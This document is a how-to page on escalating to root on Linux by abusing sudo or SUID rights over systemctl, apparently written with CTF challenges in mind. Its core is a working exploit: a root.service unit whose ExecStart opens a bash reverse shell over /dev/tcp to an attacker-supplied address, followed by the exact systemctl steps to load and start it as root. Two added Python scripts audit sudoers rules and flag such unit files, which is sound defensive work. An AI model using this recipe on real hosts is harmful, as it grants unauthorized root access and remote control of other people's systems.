How-to: systemctl sudo/suid Exploit Explained
1. Requirements
Case 0
You have the permissions to run /bin/systemctl as sudo, or the SUID bit is set on it. This case is the easiest to deal with.
Case 1 Permissions (at least):
```
/bin/systemctl daemon-reload
/bin/systemctl restart *.service
```
Case 2 Permissions (at least):
```
/bin/systemctl daemon-reload
/bin/systemctl enable *.service
/bin/systemctl start *.service
```
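A quick way to tell which of the three cases a host falls into is to read its sudo rules with that question in mind. The script below is an added example written for this page; it is not the author's code. It parses a constructed sudoers fragment (the users and rules are made up), classifies each non-root user's systemctl rights into Case 0, 1 or 2, and checks the SUID bit on the binary. The sudoers grammar it understands is deliberately limited: user-specification lines with an optional runas group and NOPASSWD-style tags, and no Cmnd_Alias expansion.

```python
import os
import re
import stat

# Constructed sample sudoers fragment (not taken from any real host). The
# comment and Defaults lines are there so the parser has to skip them.
SAMPLE_SUDOERS = """\
# /etc/sudoers.d/ops  (constructed sample)
Defaults env_reset
root    ALL=(ALL:ALL) ALL
alice   ALL=(ALL) NOPASSWD: /bin/systemctl
bob     ALL=(root) /bin/systemctl daemon-reload, /bin/systemctl restart *.service
carol   ALL=(root) /bin/systemctl daemon-reload, /bin/systemctl enable *.service, /bin/systemctl start *.service
dave    ALL=(root) /bin/systemctl status *.service
"""

# user  host=(runas) [TAG:] command, command ...
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
SYSTEMCTL = r"/(?:usr/)?bin/systemctl"


def parse_rules(text):
    """Yield (user, [allowed command strings]) for each user specification line.

    Limitation (deliberate, to keep the example short): Cmnd_Alias / User_Alias
    definitions are not expanded, so aliased rules must be checked by hand.
    """
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        # Drop tag prefixes such as NOPASSWD: or SETENV: before splitting.
        cmds = re.sub(r"\b[A-Z]+:\s*", "", m.group("cmds"))
        yield m.group("user"), [c.strip() for c in cmds.split(",")]


def allows(cmds, verb, wildcard=False):
    """True if the list grants `systemctl <verb>` (with a * or *.service argument when wildcard)."""
    args = r"\s+\*(?:\.service)?" if wildcard else ""
    pat = re.compile(SYSTEMCTL + r"\s+" + re.escape(verb) + args + r"$")
    return any(pat.match(c) for c in cmds)


def classify(cmds):
    """Map a command list onto the page's cases; None means no systemd-based path."""
    if "ALL" in cmds or any(re.fullmatch(SYSTEMCTL, c) for c in cmds):
        return "case0"  # unrestricted systemctl: any subcommand, any unit
    if allows(cmds, "daemon-reload"):
        if allows(cmds, "restart", wildcard=True):
            return "case1"
        if allows(cmds, "enable", wildcard=True) and allows(cmds, "start", wildcard=True):
            return "case2"
    return None


def audit(text):
    """Return {user: case} for every non-root user whose rules match a case."""
    hits = {}
    for user, cmds in parse_rules(text):
        if user == "root":
            continue
        case = classify(cmds)
        if case:
            hits[user] = case
    return hits


def systemctl_is_suid(path="/bin/systemctl"):
    """Case 0's other trigger: the SUID bit on the systemctl binary itself."""
    try:
        return bool(os.stat(path).st_mode & stat.S_ISUID)
    except FileNotFoundError:
        return False


if __name__ == "__main__":
    for user, case in audit(SAMPLE_SUDOERS).items():
        print(f"{user}: {case}")
    print("SUID bit on /bin/systemctl:", systemctl_is_suid())
```

On the sample, alice is Case 0 (bare systemctl), bob is Case 1, carol is Case 2, and dave (status only) is not flagged. The same functions can be pointed at a real /etc/sudoers and /etc/sudoers.d/* when reviewing a host, keeping in mind that aliases are not expanded.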
2. Code
Case 0 and Case 1
root.service
```ini
[Unit]
Description=pwn
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/your_ip/your_port 0>&1'
```
Case 0 and Case 2
root.service
```ini
[Unit]
Description=pwn
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/your_ip/your_port 0>&1'
[Install]
WantedBy=multi-user.target
```
3. Exploiting
Case 0 and Case 1
- Edit/transfer the file root.service
- Run systemctl daemon-reload
- Run systemctl restart root.service
Case 0 and Case 2
- Edit/transfer the file root.service
- Run systemctl daemon-reload
- Run systemctl enable root.service
- Run systemctl start root.service
4. Explanation
The root.service file that we create here is a systemd.unit file describing a service, and that service is what escalates us to root. Type=simple specifies that the unit is considered started successfully as soon as the ExecStart=... process has been spawned. User=root specifies that the above process runs as root. This is allowed since we are privileged enough to run systemctl commands as root :D
NOTE:
The WantedBy line is only required if you want to work with the systemctl enable command, that is, to tell the system to load this specific service while booting. Confused?
Here’s the thing. When we boot up a system, all the services that have a RequiredBy or WantedBy entry (and have been enabled) are started up. Services without one are not started. Think about it: the services that have dependencies get resolved, and those without this line are not started simply because nothing else requires or wants them. But we are not rebooting the system during a CTF challenge. We can start this service manually with the start command, so there is no need for the WantedBy line!
Check out the error message below if I do not include the [Install] instructions and use the enable command.
```
┌──(kali㉿kali)-[/etc/systemd/system]
└─$ sudo systemctl enable root.service
The unit files have no installation config (WantedBy=, RequiredBy=, Also=,
Alias= settings in the [Install] section, and DefaultInstance= for template
units). This means they are not meant to be enabled using systemctl.
...
```
Thus, only if you want to use the enable command, include the [Install] instructions. Otherwise it’s okay to skip them!
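The two points above (a unit without an [Install] section cannot be enabled, and a unit with User=root and a shell in ExecStart= is exactly what a reviewer should notice in /etc/systemd/system) can be turned into a small unit-file review. The script below is an added example for this page, not the author's code and not part of systemd. It parses three constructed units (the page's root.service with and without [Install], plus a benign web-app unit that I made up), reports whether each would pass the installation-config check behind the error message above, who it runs as, and whether ExecStart= launches a shell or opens a /dev/tcp connection. The shell-detection regex is a simple heuristic of my own, not a systemd rule.

```python
import re

# Constructed sample units, modelled on the page's root.service; none of them
# is copied from a real host.
UNIT_WITHOUT_INSTALL = """\
[Unit]
Description=pwn
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/your_ip/your_port 0>&1'
"""

UNIT_WITH_INSTALL = UNIT_WITHOUT_INSTALL + "[Install]\nWantedBy=multi-user.target\n"

BENIGN_UNIT = """\
[Unit]
Description=Example web app (constructed)
After=network.target
[Service]
Type=simple
User=www-data
ExecStart=/usr/bin/python3 /opt/app/server.py
[Install]
WantedBy=multi-user.target
"""

# The settings systemd names in its "no installation config" message.
INSTALL_KEYS = {"WantedBy", "RequiredBy", "Also", "Alias", "DefaultInstance"}

# Heuristic (assumption): an absolute path whose last component is a common shell.
SHELL_RE = re.compile(r"(?:^|\s)/(?:[^\s/]+/)*(?:ba|da|z|k)?sh(?:\s|$)")


def parse_unit(text):
    """Parse unit text into {section: {key: [values]}}; repeated keys keep every value."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current].setdefault(key.strip(), []).append(value.strip())
    return sections


def is_enableable(unit):
    """Mirror the check behind the 'unit files have no installation config' error."""
    return any(k in unit.get("Install", {}) for k in INSTALL_KEYS)


def review(text):
    """Report who the service runs as, whether it can be enabled, and shell/network use."""
    unit = parse_unit(text)
    service = unit.get("Service", {})
    # systemd runs a system service as root when User= is absent.
    user = service.get("User", ["root"])[0]
    findings = []
    if user == "root":
        findings.append("runs as root")
    for cmd in service.get("ExecStart", []):
        if SHELL_RE.search(cmd):
            findings.append("ExecStart invokes a shell")
        if "/dev/tcp/" in cmd:
            findings.append("ExecStart opens an outbound /dev/tcp connection")
    return {"user": user, "enableable": is_enableable(unit), "findings": findings}


if __name__ == "__main__":
    for name, text in [("root.service (no [Install])", UNIT_WITHOUT_INSTALL),
                       ("root.service (with [Install])", UNIT_WITH_INSTALL),
                       ("webapp.service", BENIGN_UNIT)]:
        print(name, review(text))
```

For the unit without [Install] the review returns enableable False, matching the systemctl enable error; adding WantedBy= flips it to True while the root/shell/network findings stay the same, which is the point of the note: enable only affects boot-time wiring, not what the service can do once started.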